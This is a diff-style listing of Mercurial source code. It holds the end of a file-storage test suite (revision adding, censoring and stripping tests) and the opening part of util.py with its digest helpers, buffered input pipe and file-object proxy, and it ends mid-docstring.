1083 1083 # Varying by linkrev shouldn't impact hash.
1084 1084 node2 = f.add(b'foo', None, tr, 1, nullid, nullid)
1085 1085
1086 1086 self.assertEqual(node1, node0)
1087 1087 self.assertEqual(node2, node0)
1088 1088 self.assertEqual(len(f), 1)
1089 1089
1090 1090 def testaddrevisionbadnode(self):
1091 1091 f = self._makefilefn()
1092 1092 with self._maketransactionfn() as tr:
1093 1093 # Adding a revision with bad node value fails.
1094 1094 with self.assertRaises(error.StorageError):
1095 1095 f.addrevision(b'foo', tr, 0, nullid, nullid, node=b'\x01' * 20)
1096 1096
1097 1097 def testaddrevisionunknownflag(self):
1098 1098 f = self._makefilefn()
1099 1099 with self._maketransactionfn() as tr:
1100 1100 for i in range(15, 0, -1):
1101 1101 if (1 << i) & ~repository.REVISION_FLAGS_KNOWN:
1102 1102 flags = 1 << i
1103 1103 break
1104 1104
1105 1105 with self.assertRaises(error.StorageError):
1106 1106 f.addrevision(b'foo', tr, 0, nullid, nullid, flags=flags)
1107 1107
1108 1108 def testaddgroupsimple(self):
1109 1109 f = self._makefilefn()
1110 1110
1111 1111 callbackargs = []
1112 1112
1113 1113 def cb(*args, **kwargs):
1114 1114 callbackargs.append((args, kwargs))
1115 1115
1116 1116 def linkmapper(node):
1117 1117 return 0
1118 1118
1119 1119 with self._maketransactionfn() as tr:
1120 1120 nodes = f.addgroup([], None, tr, addrevisioncb=cb)
1121 1121
1122 1122 self.assertEqual(nodes, [])
1123 1123 self.assertEqual(callbackargs, [])
1124 1124 self.assertEqual(len(f), 0)
1125 1125
1126 1126 fulltext0 = b'foo'
1127 1127 delta0 = mdiff.trivialdiffheader(len(fulltext0)) + fulltext0
1128 1128
1129 1129 with self._maketransactionfn() as tr:
1130 1130 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
1131 1131
1132 1132 f = self._makefilefn()
1133 1133
1134 1134 deltas = [
1135 1135 (node0, nullid, nullid, nullid, nullid, delta0, 0),
1136 1136 ]
1137 1137
1138 1138 with self._maketransactionfn() as tr:
1139 1139 nodes = f.addgroup(deltas, linkmapper, tr, addrevisioncb=cb)
1140 1140
1141 1141 self.assertEqual(
1142 1142 nodes,
1143 1143 [
1144 1144 b'\x49\xd8\xcb\xb1\x5c\xe2\x57\x92\x04\x47'
1145 1145 b'\x00\x6b\x46\x97\x8b\x7a\xf9\x80\xa9\x79'
1146 1146 ],
1147 1147 )
1148 1148
1149 1149 self.assertEqual(len(callbackargs), 1)
1150 1150 self.assertEqual(callbackargs[0][0][1], nodes[0])
1151 1151
1152 1152 self.assertEqual(list(f.revs()), [0])
1153 1153 self.assertEqual(f.rev(nodes[0]), 0)
1154 1154 self.assertEqual(f.node(0), nodes[0])
1155 1155
1156 1156 def testaddgroupmultiple(self):
1157 1157 f = self._makefilefn()
1158 1158
1159 1159 fulltexts = [
1160 1160 b'foo',
1161 1161 b'bar',
1162 1162 b'x' * 1024,
1163 1163 ]
1164 1164
1165 1165 nodes = []
1166 1166 with self._maketransactionfn() as tr:
1167 1167 for fulltext in fulltexts:
1168 1168 nodes.append(f.add(fulltext, None, tr, 0, nullid, nullid))
1169 1169
1170 1170 f = self._makefilefn()
1171 1171 deltas = []
1172 1172 for i, fulltext in enumerate(fulltexts):
1173 1173 delta = mdiff.trivialdiffheader(len(fulltext)) + fulltext
1174 1174
1175 1175 deltas.append((nodes[i], nullid, nullid, nullid, nullid, delta, 0))
1176 1176
1177 1177 with self._maketransactionfn() as tr:
1178 1178 self.assertEqual(f.addgroup(deltas, lambda x: 0, tr), nodes)
1179 1179
1180 1180 self.assertEqual(len(f), len(deltas))
1181 1181 self.assertEqual(list(f.revs()), [0, 1, 2])
1182 1182 self.assertEqual(f.rev(nodes[0]), 0)
1183 1183 self.assertEqual(f.rev(nodes[1]), 1)
1184 1184 self.assertEqual(f.rev(nodes[2]), 2)
1185 1185 self.assertEqual(f.node(0), nodes[0])
1186 1186 self.assertEqual(f.node(1), nodes[1])
1187 1187 self.assertEqual(f.node(2), nodes[2])
1188 1188
1189 1189 def testdeltaagainstcensored(self):
1190 1190 # Attempt to apply a delta made against a censored revision.
1191 1191 f = self._makefilefn()
1192 1192
1193 1193 stored1 = storageutil.packmeta({b'censored': b'tombstone',}, b'')
1194 1194
1195 1195 with self._maketransactionfn() as tr:
1196 1196 node0 = f.add(b'foo\n' * 30, None, tr, 0, nullid, nullid)
1197 1197
1198 1198 # The node value doesn't matter since we can't verify it.
1199 1199 node1 = b'\xbb' * 20
1200 1200
1201 1201 self._addrawrevisionfn(
1202 1202 f, tr, node1, node0, nullid, 1, stored1, censored=True
1203 1203 )
1204 1204
1205 1205 delta = mdiff.textdiff(b'bar\n' * 30, (b'bar\n' * 30) + b'baz\n')
1206 1206 deltas = [(b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0)]
1207 1207
1208 1208 with self._maketransactionfn() as tr:
1209 1209 with self.assertRaises(error.CensoredBaseError):
1210 1210 f.addgroup(deltas, lambda x: 0, tr)
1211 1211
1212 1212 def testcensorrevisionbasic(self):
1213 1213 f = self._makefilefn()
1214 1214
1215 1215 with self._maketransactionfn() as tr:
1216 1216 node0 = f.add(b'foo\n' * 30, None, tr, 0, nullid, nullid)
1217 1217 node1 = f.add(b'foo\n' * 31, None, tr, 1, node0, nullid)
1218 1218 node2 = f.add(b'foo\n' * 32, None, tr, 2, node1, nullid)
1219 1219
1220 1220 with self._maketransactionfn() as tr:
1221 1221 f.censorrevision(tr, node1)
1222 1222
1223 1223 self.assertEqual(len(f), 3)
1224 1224 self.assertEqual(list(f.revs()), [0, 1, 2])
1225 1225
1226 1226 self.assertEqual(f.read(node0), b'foo\n' * 30)
1227 1227 self.assertEqual(f.read(node2), b'foo\n' * 32)
1228 1228
1229 1229 with self.assertRaises(error.CensoredNodeError):
1230 1230 f.read(node1)
1231 1231
1232 1232 def testgetstrippointnoparents(self):
1233 1233 # N revisions where none have parents.
1234 1234 f = self._makefilefn()
1235 1235
1236 1236 with self._maketransactionfn() as tr:
1237 1237 for rev in range(10):
1238 1238 f.add(b'%d' % rev, None, tr, rev, nullid, nullid)
1239 1239
1240 1240 for rev in range(10):
1241 1241 self.assertEqual(f.getstrippoint(rev), (rev, set()))
1242 1242
1243 1243 def testgetstrippointlinear(self):
1244 1244 # N revisions in a linear chain.
1245 1245 f = self._makefilefn()
1246 1246
1247 1247 with self._maketransactionfn() as tr:
1248 1248 p1 = nullid
1249 1249
1250 1250 for rev in range(10):
1251 1251 f.add(b'%d' % rev, None, tr, rev, p1, nullid)
1252 1252
1253 1253 for rev in range(10):
1254 1254 self.assertEqual(f.getstrippoint(rev), (rev, set()))
1255 1255
1256 1256 def testgetstrippointmultipleheads(self):
1257 1257 f = self._makefilefn()
1258 1258
1259 1259 with self._maketransactionfn() as tr:
1260 1260 node0 = f.add(b'0', None, tr, 0, nullid, nullid)
1261 1261 node1 = f.add(b'1', None, tr, 1, node0, nullid)
1262 1262 f.add(b'2', None, tr, 2, node1, nullid)
1263 1263 f.add(b'3', None, tr, 3, node0, nullid)
1264 1264 f.add(b'4', None, tr, 4, node0, nullid)
1265 1265
1266 1266 for rev in range(5):
1267 1267 self.assertEqual(f.getstrippoint(rev), (rev, set()))
1268 1268
1269 1269 def testgetstrippointearlierlinkrevs(self):
1270 1270 f = self._makefilefn()
1271 1271
1272 1272 with self._maketransactionfn() as tr:
1273 1273 node0 = f.add(b'0', None, tr, 0, nullid, nullid)
1274 1274 f.add(b'1', None, tr, 10, node0, nullid)
1275 1275 f.add(b'2', None, tr, 5, node0, nullid)
1276 1276
1277 1277 self.assertEqual(f.getstrippoint(0), (0, set()))
1278 1278 self.assertEqual(f.getstrippoint(1), (1, set()))
1279 1279 self.assertEqual(f.getstrippoint(2), (1, set()))
1280 1280 self.assertEqual(f.getstrippoint(3), (1, set()))
1281 1281 self.assertEqual(f.getstrippoint(4), (1, set()))
1282 1282 self.assertEqual(f.getstrippoint(5), (1, set()))
1283 1283 self.assertEqual(f.getstrippoint(6), (1, {2}))
1284 1284 self.assertEqual(f.getstrippoint(7), (1, {2}))
1285 1285 self.assertEqual(f.getstrippoint(8), (1, {2}))
1286 1286 self.assertEqual(f.getstrippoint(9), (1, {2}))
1287 1287 self.assertEqual(f.getstrippoint(10), (1, {2}))
1288 1288 self.assertEqual(f.getstrippoint(11), (3, set()))
1289 1289
1290 1290 def teststripempty(self):
1291 1291 f = self._makefilefn()
1292 1292
1293 1293 with self._maketransactionfn() as tr:
1294 1294 f.strip(0, tr)
1295 1295
1296 1296 self.assertEqual(len(f), 0)
1297 1297
1298 1298 def teststripall(self):
1299 1299 f = self._makefilefn()
1300 1300
1301 1301 with self._maketransactionfn() as tr:
1302 1302 p1 = nullid
1303 1303 for rev in range(10):
1304 1304 p1 = f.add(b'%d' % rev, None, tr, rev, p1, nullid)
1305 1305
1306 1306 self.assertEqual(len(f), 10)
1307 1307
1308 1308 with self._maketransactionfn() as tr:
1309 1309 f.strip(0, tr)
1310 1310
1311 1311 self.assertEqual(len(f), 0)
1312 1312
1313 1313 def teststrippartial(self):
1314 1314 f = self._makefilefn()
1315 1315
1316 1316 with self._maketransactionfn() as tr:
1317 1317 f.add(b'0', None, tr, 0, nullid, nullid)
1318 1318 node1 = f.add(b'1', None, tr, 5, nullid, nullid)
1319 1319 node2 = f.add(b'2', None, tr, 10, nullid, nullid)
1320 1320
1321 1321 self.assertEqual(len(f), 3)
1322 1322
1323 1323 with self._maketransactionfn() as tr:
1324 1324 f.strip(11, tr)
1325 1325
1326 1326 self.assertEqual(len(f), 3)
1327 1327
1328 1328 with self._maketransactionfn() as tr:
1329 1329 f.strip(10, tr)
1330 1330
1331 1331 self.assertEqual(len(f), 2)
1332 1332
1333 1333 with self.assertRaises(error.LookupError):
1334 1334 f.rev(node2)
1335 1335
1336 1336 with self._maketransactionfn() as tr:
1337 1337 f.strip(6, tr)
1338 1338
1339 1339 self.assertEqual(len(f), 2)
1340 1340
1341 1341 with self._maketransactionfn() as tr:
1342 1342 f.strip(3, tr)
1343 1343
1344 1344 self.assertEqual(len(f), 1)
1345 1345
1346 1346 with self.assertRaises(error.LookupError):
1347 1347 f.rev(node1)
1348 1348
1349 1349
1350 1350 def makeifileindextests(makefilefn, maketransactionfn, addrawrevisionfn):
1351 1351 """Create a unittest.TestCase class suitable for testing file storage.
1352 1352
1353 1353 ``makefilefn`` is a callable which receives the test case as an
1354 1354 argument and returns an object implementing the ``ifilestorage`` interface.
1355 1355
1356 1356 ``maketransactionfn`` is a callable which receives the test case as an
1357 1357 argument and returns a transaction object.
1358 1358
1359 1359 ``addrawrevisionfn`` is a callable which receives arguments describing a
1360 1360 low-level revision to add. This callable allows the insertion of
1361 1361 potentially bad data into the store in order to facilitate testing.
1362 1362
1363 1363 Returns a type that is a ``unittest.TestCase`` that can be used for
1364 1364 testing the object implementing the file storage interface. Simply
1365 1365 assign the returned value to a module-level attribute and a test loader
1366 1366 should find and run it automatically.
1367 1367 """
1368 1368 d = {
1369 1369 r'_makefilefn': makefilefn,
1370 1370 r'_maketransactionfn': maketransactionfn,
1371 1371 r'_addrawrevisionfn': addrawrevisionfn,
1372 1372 }
1373 1373 return type(r'ifileindextests', (ifileindextests,), d)
1374 1374
1375 1375
1376 1376 def makeifiledatatests(makefilefn, maketransactionfn, addrawrevisionfn):
1377 1377 d = {
1378 1378 r'_makefilefn': makefilefn,
1379 1379 r'_maketransactionfn': maketransactionfn,
1380 1380 r'_addrawrevisionfn': addrawrevisionfn,
1381 1381 }
1382 1382 return type(r'ifiledatatests', (ifiledatatests,), d)
1383 1383
1384 1384
1385 1385 def makeifilemutationtests(makefilefn, maketransactionfn, addrawrevisionfn):
1386 1386 d = {
1387 1387 r'_makefilefn': makefilefn,
1388 1388 r'_maketransactionfn': maketransactionfn,
1389 1389 r'_addrawrevisionfn': addrawrevisionfn,
1390 1390 }
1391 1391 return type(r'ifilemutationtests', (ifilemutationtests,), d)
@@ -1,3660 +1,3660
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import attr
38 38 from .pycompat import (
39 39 delattr,
40 40 getattr,
41 41 open,
42 42 setattr,
43 43 )
44 44 from hgdemandimport import tracing
45 45 from . import (
46 46 encoding,
47 47 error,
48 48 i18n,
49 49 node as nodemod,
50 50 policy,
51 51 pycompat,
52 52 urllibcompat,
53 53 )
54 54 from .utils import (
55 55 compression,
56 56 procutil,
57 57 stringutil,
58 58 )
59 59
60 60 rustdirs = policy.importrust(r'dirstate', r'Dirs')
61 61
62 62 base85 = policy.importmod(r'base85')
63 63 osutil = policy.importmod(r'osutil')
64 64 parsers = policy.importmod(r'parsers')
65 65
66 66 b85decode = base85.b85decode
67 67 b85encode = base85.b85encode
68 68
69 69 cookielib = pycompat.cookielib
70 70 httplib = pycompat.httplib
71 71 pickle = pycompat.pickle
72 72 safehasattr = pycompat.safehasattr
73 73 socketserver = pycompat.socketserver
74 74 bytesio = pycompat.bytesio
75 75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 76 stringio = bytesio
77 77 xmlrpclib = pycompat.xmlrpclib
78 78
79 79 httpserver = urllibcompat.httpserver
80 80 urlerr = urllibcompat.urlerr
81 81 urlreq = urllibcompat.urlreq
82 82
83 83 # workaround for win32mbcs
84 84 _filenamebytestr = pycompat.bytestr
85 85
86 86 if pycompat.iswindows:
87 87 from . import windows as platform
88 88 else:
89 89 from . import posix as platform
90 90
91 91 _ = i18n._
92 92
93 93 bindunixsocket = platform.bindunixsocket
94 94 cachestat = platform.cachestat
95 95 checkexec = platform.checkexec
96 96 checklink = platform.checklink
97 97 copymode = platform.copymode
98 98 expandglobs = platform.expandglobs
99 99 getfsmountpoint = platform.getfsmountpoint
100 100 getfstype = platform.getfstype
101 101 groupmembers = platform.groupmembers
102 102 groupname = platform.groupname
103 103 isexec = platform.isexec
104 104 isowner = platform.isowner
105 105 listdir = osutil.listdir
106 106 localpath = platform.localpath
107 107 lookupreg = platform.lookupreg
108 108 makedir = platform.makedir
109 109 nlinks = platform.nlinks
110 110 normpath = platform.normpath
111 111 normcase = platform.normcase
112 112 normcasespec = platform.normcasespec
113 113 normcasefallback = platform.normcasefallback
114 114 openhardlinks = platform.openhardlinks
115 115 oslink = platform.oslink
116 116 parsepatchoutput = platform.parsepatchoutput
117 117 pconvert = platform.pconvert
118 118 poll = platform.poll
119 119 posixfile = platform.posixfile
120 120 readlink = platform.readlink
121 121 rename = platform.rename
122 122 removedirs = platform.removedirs
123 123 samedevice = platform.samedevice
124 124 samefile = platform.samefile
125 125 samestat = platform.samestat
126 126 setflags = platform.setflags
127 127 split = platform.split
128 128 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
129 129 statisexec = platform.statisexec
130 130 statislink = platform.statislink
131 131 umask = platform.umask
132 132 unlink = platform.unlink
133 133 username = platform.username
134 134
135 135 # small compat layer
136 136 compengines = compression.compengines
137 137 SERVERROLE = compression.SERVERROLE
138 138 CLIENTROLE = compression.CLIENTROLE
139 139
140 140 try:
141 141 recvfds = osutil.recvfds
142 142 except AttributeError:
143 143 pass
144 144
145 145 # Python compatibility
146 146
147 147 _notset = object()
148 148
149 149
150 150 def bitsfrom(container):
151 151 bits = 0
152 152 for bit in container:
153 153 bits |= bit
154 154 return bits
155 155
156 156
157 157 # python 2.6 still have deprecation warning enabled by default. We do not want
158 158 # to display anything to standard user so detect if we are running test and
159 159 # only use python deprecation warning in this case.
160 160 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
161 161 if _dowarn:
162 162 # explicitly unfilter our warning for python 2.7
163 163 #
164 164 # The option of setting PYTHONWARNINGS in the test runner was investigated.
165 165 # However, module name set through PYTHONWARNINGS was exactly matched, so
166 166 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
167 167 # makes the whole PYTHONWARNINGS thing useless for our usecase.
168 168 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
169 169 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
170 170 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
171 171 if _dowarn and pycompat.ispy3:
172 172 # silence warning emitted by passing user string to re.sub()
173 173 warnings.filterwarnings(
174 174 r'ignore', r'bad escape', DeprecationWarning, r'mercurial'
175 175 )
176 176 warnings.filterwarnings(
177 177 r'ignore', r'invalid escape sequence', DeprecationWarning, r'mercurial'
178 178 )
179 179 # TODO: reinvent imp.is_frozen()
180 180 warnings.filterwarnings(
181 181 r'ignore',
182 182 r'the imp module is deprecated',
183 183 DeprecationWarning,
184 184 r'mercurial',
185 185 )
186 186
187 187
188 188 def nouideprecwarn(msg, version, stacklevel=1):
189 189 """Issue an python native deprecation warning
190 190
191 191 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
192 192 """
193 193 if _dowarn:
194 194 msg += (
195 195 b"\n(compatibility will be dropped after Mercurial-%s,"
196 196 b" update your code.)"
197 197 ) % version
198 198 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
199 199
200 200
201 201 DIGESTS = {
202 202 b'md5': hashlib.md5,
203 203 b'sha1': hashlib.sha1,
204 204 b'sha512': hashlib.sha512,
205 205 }
206 206 # List of digest types from strongest to weakest
207 207 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
208 208
209 209 for k in DIGESTS_BY_STRENGTH:
210 210 assert k in DIGESTS
211 211
212 212
213 213 class digester(object):
214 214 """helper to compute digests.
215 215
216 216 This helper can be used to compute one or more digests given their name.
217 217
218 218 >>> d = digester([b'md5', b'sha1'])
219 219 >>> d.update(b'foo')
220 220 >>> [k for k in sorted(d)]
221 221 ['md5', 'sha1']
222 222 >>> d[b'md5']
223 223 'acbd18db4cc2f85cedef654fccc4a4d8'
224 224 >>> d[b'sha1']
225 225 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
226 226 >>> digester.preferred([b'md5', b'sha1'])
227 227 'sha1'
228 228 """
229 229
230 230 def __init__(self, digests, s=b''):
231 231 self._hashes = {}
232 232 for k in digests:
233 233 if k not in DIGESTS:
234 234 raise error.Abort(_(b'unknown digest type: %s') % k)
235 235 self._hashes[k] = DIGESTS[k]()
236 236 if s:
237 237 self.update(s)
238 238
239 239 def update(self, data):
240 240 for h in self._hashes.values():
241 241 h.update(data)
242 242
243 243 def __getitem__(self, key):
244 244 if key not in DIGESTS:
245 245 raise error.Abort(_(b'unknown digest type: %s') % k)
246 246 return nodemod.hex(self._hashes[key].digest())
247 247
248 248 def __iter__(self):
249 249 return iter(self._hashes)
250 250
251 251 @staticmethod
252 252 def preferred(supported):
253 253 """returns the strongest digest type in both supported and DIGESTS."""
254 254
255 255 for k in DIGESTS_BY_STRENGTH:
256 256 if k in supported:
257 257 return k
258 258 return None
259 259
260 260
261 261 class digestchecker(object):
262 262 """file handle wrapper that additionally checks content against a given
263 263 size and digests.
264 264
265 265 d = digestchecker(fh, size, {'md5': '...'})
266 266
267 267 When multiple digests are given, all of them are validated.
268 268 """
269 269
270 270 def __init__(self, fh, size, digests):
271 271 self._fh = fh
272 272 self._size = size
273 273 self._got = 0
274 274 self._digests = dict(digests)
275 275 self._digester = digester(self._digests.keys())
276 276
277 277 def read(self, length=-1):
278 278 content = self._fh.read(length)
279 279 self._digester.update(content)
280 280 self._got += len(content)
281 281 return content
282 282
283 283 def validate(self):
284 284 if self._size != self._got:
285 285 raise error.Abort(
286 286 _(b'size mismatch: expected %d, got %d')
287 287 % (self._size, self._got)
288 288 )
289 289 for k, v in self._digests.items():
290 290 if v != self._digester[k]:
291 291 # i18n: first parameter is a digest name
292 292 raise error.Abort(
293 293 _(b'%s mismatch: expected %s, got %s')
294 294 % (k, v, self._digester[k])
295 295 )
296 296
297 297
298 298 try:
299 299 buffer = buffer
300 300 except NameError:
301 301
302 302 def buffer(sliceable, offset=0, length=None):
303 303 if length is not None:
304 304 return memoryview(sliceable)[offset : offset + length]
305 305 return memoryview(sliceable)[offset:]
306 306
307 307
308 308 _chunksize = 4096
309 309
310 310
311 311 class bufferedinputpipe(object):
312 312 """a manually buffered input pipe
313 313
314 314 Python will not let us use buffered IO and lazy reading with 'polling' at
315 315 the same time. We cannot probe the buffer state and select will not detect
316 316 that data are ready to read if they are already buffered.
317 317
318 318 This class let us work around that by implementing its own buffering
319 319 (allowing efficient readline) while offering a way to know if the buffer is
320 320 empty from the output (allowing collaboration of the buffer with polling).
321 321
322 322 This class lives in the 'util' module because it makes use of the 'os'
323 323 module from the python stdlib.
324 324 """
325 325
326 326 def __new__(cls, fh):
327 327 # If we receive a fileobjectproxy, we need to use a variation of this
328 328 # class that notifies observers about activity.
329 329 if isinstance(fh, fileobjectproxy):
330 330 cls = observedbufferedinputpipe
331 331
332 332 return super(bufferedinputpipe, cls).__new__(cls)
333 333
334 334 def __init__(self, input):
335 335 self._input = input
336 336 self._buffer = []
337 337 self._eof = False
338 338 self._lenbuf = 0
339 339
340 340 @property
341 341 def hasbuffer(self):
342 342 """True is any data is currently buffered
343 343
344 344 This will be used externally a pre-step for polling IO. If there is
345 345 already data then no polling should be set in place."""
346 346 return bool(self._buffer)
347 347
348 348 @property
349 349 def closed(self):
350 350 return self._input.closed
351 351
352 352 def fileno(self):
353 353 return self._input.fileno()
354 354
355 355 def close(self):
356 356 return self._input.close()
357 357
358 358 def read(self, size):
359 359 while (not self._eof) and (self._lenbuf < size):
360 360 self._fillbuffer()
361 361 return self._frombuffer(size)
362 362
363 363 def unbufferedread(self, size):
364 364 if not self._eof and self._lenbuf == 0:
365 365 self._fillbuffer(max(size, _chunksize))
366 366 return self._frombuffer(min(self._lenbuf, size))
367 367
368 368 def readline(self, *args, **kwargs):
369 369 if len(self._buffer) > 1:
370 370 # this should not happen because both read and readline end with a
371 371 # _frombuffer call that collapse it.
372 372 self._buffer = [b''.join(self._buffer)]
373 373 self._lenbuf = len(self._buffer[0])
374 374 lfi = -1
375 375 if self._buffer:
376 376 lfi = self._buffer[-1].find(b'\n')
377 377 while (not self._eof) and lfi < 0:
378 378 self._fillbuffer()
379 379 if self._buffer:
380 380 lfi = self._buffer[-1].find(b'\n')
381 381 size = lfi + 1
382 382 if lfi < 0: # end of file
383 383 size = self._lenbuf
384 384 elif len(self._buffer) > 1:
385 385 # we need to take previous chunks into account
386 386 size += self._lenbuf - len(self._buffer[-1])
387 387 return self._frombuffer(size)
388 388
389 389 def _frombuffer(self, size):
390 390 """return at most 'size' data from the buffer
391 391
392 392 The data are removed from the buffer."""
393 393 if size == 0 or not self._buffer:
394 394 return b''
395 395 buf = self._buffer[0]
396 396 if len(self._buffer) > 1:
397 397 buf = b''.join(self._buffer)
398 398
399 399 data = buf[:size]
400 400 buf = buf[len(data) :]
401 401 if buf:
402 402 self._buffer = [buf]
403 403 self._lenbuf = len(buf)
404 404 else:
405 405 self._buffer = []
406 406 self._lenbuf = 0
407 407 return data
408 408
409 409 def _fillbuffer(self, size=_chunksize):
410 410 """read data to the buffer"""
411 411 data = os.read(self._input.fileno(), size)
412 412 if not data:
413 413 self._eof = True
414 414 else:
415 415 self._lenbuf += len(data)
416 416 self._buffer.append(data)
417 417
418 418 return data
419 419
420 420
421 421 def mmapread(fp):
422 422 try:
423 423 fd = getattr(fp, 'fileno', lambda: fp)()
424 424 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
425 425 except ValueError:
426 426 # Empty files cannot be mmapped, but mmapread should still work. Check
427 427 # if the file is empty, and if so, return an empty buffer.
428 428 if os.fstat(fd).st_size == 0:
429 429 return b''
430 430 raise
431 431
432 432
433 433 class fileobjectproxy(object):
434 434 """A proxy around file objects that tells a watcher when events occur.
435 435
436 436 This type is intended to only be used for testing purposes. Think hard
437 437 before using it in important code.
438 438 """
439 439
440 440 __slots__ = (
441 441 r'_orig',
442 442 r'_observer',
443 443 )
444 444
445 445 def __init__(self, fh, observer):
446 446 object.__setattr__(self, r'_orig', fh)
447 447 object.__setattr__(self, r'_observer', observer)
448 448
449 449 def __getattribute__(self, name):
450 450 ours = {
451 451 r'_observer',
452 452 # IOBase
453 453 r'close',
454 454 # closed if a property
455 455 r'fileno',
456 456 r'flush',
457 457 r'isatty',
458 458 r'readable',
459 459 r'readline',
460 460 r'readlines',
461 461 r'seek',
462 462 r'seekable',
463 463 r'tell',
464 464 r'truncate',
465 465 r'writable',
466 466 r'writelines',
467 467 # RawIOBase
468 468 r'read',
469 469 r'readall',
470 470 r'readinto',
471 471 r'write',
472 472 # BufferedIOBase
473 473 # raw is a property
474 474 r'detach',
475 475 # read defined above
476 476 r'read1',
477 477 # readinto defined above
478 478 # write defined above
479 479 }
480 480
481 481 # We only observe some methods.
482 482 if name in ours:
483 483 return object.__getattribute__(self, name)
484 484
485 485 return getattr(object.__getattribute__(self, r'_orig'), name)
486 486
487 487 def __nonzero__(self):
488 488 return bool(object.__getattribute__(self, r'_orig'))
489 489
490 490 __bool__ = __nonzero__
491 491
492 492 def __delattr__(self, name):
493 493 return delattr(object.__getattribute__(self, r'_orig'), name)
494 494
495 495 def __setattr__(self, name, value):
496 496 return setattr(object.__getattribute__(self, r'_orig'), name, value)
497 497
498 498 def __iter__(self):
499 499 return object.__getattribute__(self, r'_orig').__iter__()
500 500
501 501 def _observedcall(self, name, *args, **kwargs):
502 502 # Call the original object.
503 503 orig = object.__getattribute__(self, r'_orig')
504 504 res = getattr(orig, name)(*args, **kwargs)
505 505
506 506 # Call a method on the observer of the same name with arguments
507 507 # so it can react, log, etc.
508 508 observer = object.__getattribute__(self, r'_observer')
509 509 fn = getattr(observer, name, None)
510 510 if fn:
511 511 fn(res, *args, **kwargs)
512 512
513 513 return res
514 514
515 515 def close(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'close', *args, **kwargs
518 518 )
519 519
520 520 def fileno(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'fileno', *args, **kwargs
523 523 )
524 524
525 525 def flush(self, *args, **kwargs):
526 526 return object.__getattribute__(self, r'_observedcall')(
527 527 r'flush', *args, **kwargs
528 528 )
529 529
530 530 def isatty(self, *args, **kwargs):
531 531 return object.__getattribute__(self, r'_observedcall')(
532 532 r'isatty', *args, **kwargs
533 533 )
534 534
535 535 def readable(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readable', *args, **kwargs
538 538 )
539 539
540 540 def readline(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readline', *args, **kwargs
543 543 )
544 544
545 545 def readlines(self, *args, **kwargs):
546 546 return object.__getattribute__(self, r'_observedcall')(
547 547 r'readlines', *args, **kwargs
548 548 )
549 549
550 550 def seek(self, *args, **kwargs):
551 551 return object.__getattribute__(self, r'_observedcall')(
552 552 r'seek', *args, **kwargs
553 553 )
554 554
555 555 def seekable(self, *args, **kwargs):
556 556 return object.__getattribute__(self, r'_observedcall')(
557 557 r'seekable', *args, **kwargs
558 558 )
559 559
560 560 def tell(self, *args, **kwargs):
561 561 return object.__getattribute__(self, r'_observedcall')(
562 562 r'tell', *args, **kwargs
563 563 )
564 564
565 565 def truncate(self, *args, **kwargs):
566 566 return object.__getattribute__(self, r'_observedcall')(
567 567 r'truncate', *args, **kwargs
568 568 )
569 569
570 570 def writable(self, *args, **kwargs):
571 571 return object.__getattribute__(self, r'_observedcall')(
572 572 r'writable', *args, **kwargs
573 573 )
574 574
575 575 def writelines(self, *args, **kwargs):
576 576 return object.__getattribute__(self, r'_observedcall')(
577 577 r'writelines', *args, **kwargs
578 578 )
579 579
580 580 def read(self, *args, **kwargs):
581 581 return object.__getattribute__(self, r'_observedcall')(
582 582 r'read', *args, **kwargs
583 583 )
584 584
585 585 def readall(self, *args, **kwargs):
586 586 return object.__getattribute__(self, r'_observedcall')(
587 587 r'readall', *args, **kwargs
588 588 )
589 589
590 590 def readinto(self, *args, **kwargs):
591 591 return object.__getattribute__(self, r'_observedcall')(
592 592 r'readinto', *args, **kwargs
593 593 )
594 594
595 595 def write(self, *args, **kwargs):
596 596 return object.__getattribute__(self, r'_observedcall')(
597 597 r'write', *args, **kwargs
598 598 )
599 599
600 600 def detach(self, *args, **kwargs):
601 601 return object.__getattribute__(self, r'_observedcall')(
602 602 r'detach', *args, **kwargs
603 603 )
604 604
605 605 def read1(self, *args, **kwargs):
606 606 return object.__getattribute__(self, r'_observedcall')(
607 607 r'read1', *args, **kwargs
608 608 )
609 609
610 610
611 611 class observedbufferedinputpipe(bufferedinputpipe):
612 612 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
613 613
614 614 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
615 615 bypass ``fileobjectproxy``. Because of this, we need to make
616 616 ``bufferedinputpipe`` aware of these operations.
617 617
618 618 This variation of ``bufferedinputpipe`` can notify observers about
